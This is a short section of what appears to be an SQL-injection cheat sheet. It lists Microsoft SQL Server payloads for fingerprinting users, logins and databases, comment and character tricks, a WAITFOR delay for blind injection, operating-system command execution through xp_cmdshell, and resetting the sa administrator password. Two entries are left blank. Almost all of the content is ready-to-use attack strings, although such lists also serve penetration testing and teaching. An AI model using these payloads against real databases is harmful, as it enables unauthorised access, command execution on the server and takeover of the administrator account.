4.1.7.1. SQL Server Payload
- Version
-
- Comment
SELECT 1 -- commentSELECT /*comment*/1
- Current User
SELECT user_name()SELECT system_userSELECT userSELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
- List User
SELECT name FROM master..syslogins
- Current Database
-
- List Database
SELECT name FROM master..sysdatabases
- Command
EXEC xp_cmdshell 'net user'
- Ascii
SELECT char(0×41)SELECT ascii('A')SELECT char(65)+char(66) => return AB
- Delay
WAITFOR DELAY '0:0:3' pause for 3 seconds
- Change Password
ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'